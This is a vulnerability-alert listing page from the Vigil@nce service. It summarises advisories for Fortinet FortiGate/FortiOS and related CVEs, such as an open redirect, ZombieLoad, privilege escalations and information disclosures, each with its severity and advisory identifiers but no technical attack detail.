The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of FG

computer vulnerability alert CVE-2018-13384

Fortinet FortiOS: open redirect via the VPN portal

Synthesis of the vulnerability

An attacker can deceive the user via VPN of Fortinet FortiOS, in order to redirect him to a malicious site.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 1/4.
Consequences: user access/rights, data reading.
Provenance: internet client.
Creation date: 22/05/2019.
Identifiers: CVE-2018-13384, FG-IR-19-002, VIGILANCE-VUL-29386.

Description of the vulnerability

An attacker can deceive the user via the VPN portal of Fortinet FortiOS, in order to redirect him to a malicious site.
Full Vigil@nce bulletin... (Free trial)

vulnerability CVE-2018-12126 CVE-2018-12127 CVE-2018-12130

Intel processors: information disclosure via performance measurement

Synthesis of the vulnerability

An attacker can measure performances of his process, in order to get sensitive information about other process or, if the host is virtualized, about other guest systems.
Impacted products: XenServer, Debian, Fedora, FortiAnalyzer, FortiGate, FortiManager, FortiOS, FreeBSD, Linux, Windows 10, Windows 2008 R0, Windows 2008 R2, Windows 2012, Windows 2016, Windows 2019, Windows 7, Windows 8, Windows RT, OpenBSD, openSUSE Leap, PAN-OS, pfSense, RHEL, SIMATIC, SUSE Linux Enterprise Desktop, SLES, Synology DSM, Synology DS***, Synology RS***, Ubuntu, ESXi, vCenter Server, VMware vSphere Hypervisor, Xen.
Severity: 1/4.
Consequences: data reading.
Provenance: user shell.
Number of vulnerabilities in this bulletin: 4.
Creation date: 15/05/2019.
Revision date: 15/05/2019.
Identifiers: CERTFR-2019-AVI-209, CERTFR-2019-AVI-211, CERTFR-2019-AVI-212, CERTFR-2019-AVI-213, CERTFR-2019-AVI-215, CERTFR-2019-AVI-217, CERTFR-2019-AVI-229, CERTFR-2019-AVI-230, CERTFR-2019-AVI-233, CERTFR-2019-AVI-311, CTX251995, CVE-2018-12126, CVE-2018-12127, CVE-2018-12130, CVE-2019-11091, DLA-1787-1, DLA-1789-1, DLA-1789-2, DLA-1799-1, DLA-1799-2, DSA-4444-1, DSA-4447-1, DSA-4447-2, FEDORA-2019-0731828893, FEDORA-2019-1f5832fc0e, FEDORA-2019-640f8d8dd1, FEDORA-2019-6458474bf2, FEDORA-2019-c36afa818c, FEDORA-2019-e6bf55e821, FEDORA-2019-eb08fb0c5f, FG-IR-18-002, FreeBSD-SA-19:07.mds, INTEL-SA-00233, openSUSE-SU-2019:1402-1, openSUSE-SU-2019:1403-1, openSUSE-SU-2019:1404-1, openSUSE-SU-2019:1405-1, openSUSE-SU-2019:1407-1, openSUSE-SU-2019:1408-1, openSUSE-SU-2019:1419-1, openSUSE-SU-2019:1420-1, openSUSE-SU-2019:1468-1, openSUSE-SU-2019:1505-1, PAN-SA-2019-0012, RHSA-2019:1155-01, RHSA-2019:1167-01, RHSA-2019:1168-01, RHSA-2019:1169-01, RHSA-2019:1170-01, RHSA-2019:1171-01, RHSA-2019:1172-01, RHSA-2019:1174-01, RHSA-2019:1175-01, RHSA-2019:1176-01, RHSA-2019:1177-01, RHSA-2019:1178-01, RHSA-2019:1180-01, RHSA-2019:1181-01, RHSA-2019:1182-01, RHSA-2019:1183-01, RHSA-2019:1184-01, RHSA-2019:1185-01, RHSA-2019:1186-01, RHSA-2019:1187-01, RHSA-2019:1188-01, RHSA-2019:1189-01, RHSA-2019:1190-01, RHSA-2019:1193-01, RHSA-2019:1194-01, RHSA-2019:1195-01, RHSA-2019:1196-01, RHSA-2019:1197-01, RHSA-2019:1198-01, SSA-616472, SUSE-SU-2019:1235-1, SUSE-SU-2019:1236-1, SUSE-SU-2019:1238-1, SUSE-SU-2019:1239-1, SUSE-SU-2019:1240-1, SUSE-SU-2019:1241-1, SUSE-SU-2019:1242-1, SUSE-SU-2019:1243-1, SUSE-SU-2019:1244-1, SUSE-SU-2019:1245-1, SUSE-SU-2019:1248-1, SUSE-SU-2019:1268-1, SUSE-SU-2019:1269-1, SUSE-SU-2019:1272-1, SUSE-SU-2019:1287-1, SUSE-SU-2019:1289-1, SUSE-SU-2019:1296-1, SUSE-SU-2019:1313-1, SUSE-SU-2019:1347-1, SUSE-SU-2019:1348-1, SUSE-SU-2019:1349-1, SUSE-SU-2019:1356-1, SUSE-SU-2019:1371-1, SUSE-SU-2019:14048-1, SUSE-SU-2019:14051-1, SUSE-SU-2019:14052-1, SUSE-SU-2019:14063-1, SUSE-SU-2019:1423-1, SUSE-SU-2019:1438-1, SUSE-SU-2019:1452-1, SUSE-SU-2019:1490-1, SUSE-SU-2019:1547-1, SUSE-SU-2019:1550-1, Synology-SA-19:24, USN-3977-1, USN-3977-2, USN-3977-3, USN-3978-1, USN-3979-1, USN-3980-1, USN-3981-1, USN-3981-2, USN-3982-1, USN-3982-2, USN-3983-1, USN-3983-2, USN-3984-1, USN-3985-1, USN-3985-2, VIGILANCE-VUL-29300, VMSA-2019-0008, XSA-297, ZombieLoad.

Description of the vulnerability

An attacker can measure performances of his process, in order to get sensitive information about other process or, if the host is virtualized, about other guest systems.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability CVE-2018-13371

FortiOS: privilege escalation via ZebOS Routing Settings Change

Synthesis of the vulnerability

An attacker can bypass restrictions via ZebOS Routing Settings Change of FortiOS, in order to escalate his privileges.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 2/4.
Consequences: privileged access/rights, data creation/edition.
Provenance: user account.
Creation date: 04/04/2019.
Identifiers: CERTFR-2019-AVI-147, CVE-2018-13371, FG-IR-18-230, VIGILANCE-VUL-28945.

Description of the vulnerability

An attacker can bypass restrictions via ZebOS Routing Settings Change of FortiOS, in order to escalate his privileges.
Full Vigil@nce bulletin... (Free trial)

vulnerability announce CVE-2017-17544

FortiOS: privilege escalation via Restoring Modified Configurations

Synthesis of the vulnerability

An attacker can bypass restrictions via Restoring Modified Configurations of FortiOS, in order to escalate his privileges.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 1/4.
Consequences: administrator access/rights, privileged access/rights.
Provenance: privileged account.
Creation date: 03/04/2019.
Identifiers: CERTFR-2019-AVI-143, CVE-2017-17544, FG-IR-17-053, VIGILANCE-VUL-28932.

Description of the vulnerability

An attacker can bypass restrictions via Restoring Modified Configurations of FortiOS, in order to escalate his privileges.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability alert 28906

FortiOS: information disclosure via HTTP Headers Parsing

Synthesis of the vulnerability

An attacker can bypass access restrictions to data via HTTP Headers Parsing of FortiOS, in order to obtain sensitive information.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 2/4.
Consequences: data reading.
Provenance: intranet client.
Creation date: 01/04/2019.
Identifiers: CERTFR-2019-AVI-137, FG-IR-19-043, VIGILANCE-VUL-28906.

Description of the vulnerability

An attacker can bypass access restrictions to data via HTTP Headers Parsing of FortiOS, in order to obtain sensitive information.
Full Vigil@nce bulletin... (Free trial)

vulnerability alert CVE-2018-13376

FortiOS: information disclosure via Web Proxy Disclaimer Response

Synthesis of the vulnerability

A local attacker can read a memory fragment via Web Proxy Disclaimer Response of FortiOS, in order to obtain sensitive information.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 1/4.
Consequences: data reading.
Provenance: user shell.
Creation date: 23/11/2018.
Identifiers: CERTFR-2018-AVI-570, CVE-2018-13376, FG-IR-18-325, VIGILANCE-VUL-27871.

Description of the vulnerability

A local attacker can read a memory fragment via Web Proxy Disclaimer Response of FortiOS, in order to obtain sensitive information.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability announce CVE-2018-13366

FortiGate: information disclosure via PPTP Server Hostname

Synthesis of the vulnerability

An attacker can bypass access restrictions to data via PPTP Server Hostname of FortiGate, in order to obtain sensitive information.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 2/4.
Consequences: data reading.
Provenance: intranet client.
Creation date: 19/11/2018.
Identifiers: CERTFR-2018-AVI-560, CVE-2018-13366, FG-IR-18-101, VIGILANCE-VUL-27827.

Description of the vulnerability

An attacker can bypass access restrictions to data via PPTP Server Hostname of FortiGate, in order to obtain sensitive information.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability alert CVE-2018-13374

FortiGate: privilege escalation via LDAP Server Connectivity

Synthesis of the vulnerability

An attacker can bypass restrictions via LDAP Server Connectivity of Fortigate, in order to escalate his privileges.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 1/4.
Consequences: privileged access/rights, data reading.
Provenance: privileged account.
Creation date: 19/11/2018.
Identifiers: CERTFR-2018-AVI-560, CVE-2018-13374, FG-IR-18-157, VIGILANCE-VUL-27826.

Description of the vulnerability

An attacker can bypass restrictions via LDAP Server Connectivity of FortiGate, in order to escalate his privileges.
Full Vigil@nce bulletin... (Free trial)

vulnerability bulletin 27203

WPA/WPA2: information disclosure via PSK PMKID

Synthesis of the vulnerability

An attacker can bypass access restrictions to data via PSK PMKID of WPA/WPA2, in order to obtain sensitive information.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS, 802.11 protocol.
Severity: 2/4.
Consequences: data reading.
Provenance: radio connection.
Creation date: 11/09/2018.
Identifiers: FG-IR-18-199, VIGILANCE-VUL-27203.

Description of the vulnerability

An attacker can bypass access restrictions to data via PSK PMKID of WPA/WPA2, in order to obtain sensitive information.
Full Vigil@nce bulletin... (Free trial)

vulnerability announce CVE-2018-9192 CVE-2018-9194

FortiOS: information disclosure via ROBOT Attack

Synthesis of the vulnerability

An attacker can bypass access restrictions to data via ROBOT Attack (VIGILANCE-VUL-24749) of FortiOS, in order to obtain sensitive information.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 2/4.
Consequences: data reading.
Provenance: internet client.
Number of vulnerabilities in this bulletin: 2.
Creation date: 06/09/2018.
Identifiers: CVE-2018-9192, CVE-2018-9194, FG-IR-17-302, VIGILANCE-VUL-27172.

Description of the vulnerability

An attacker can bypass access restrictions to data via ROBOT Attack (VIGILANCE-VUL-24749) of FortiOS, in order to obtain sensitive information.
Full Vigil@nce bulletin... (Free trial)
Our database contains other pages. You can request a free trial to read them.

Display information about FG: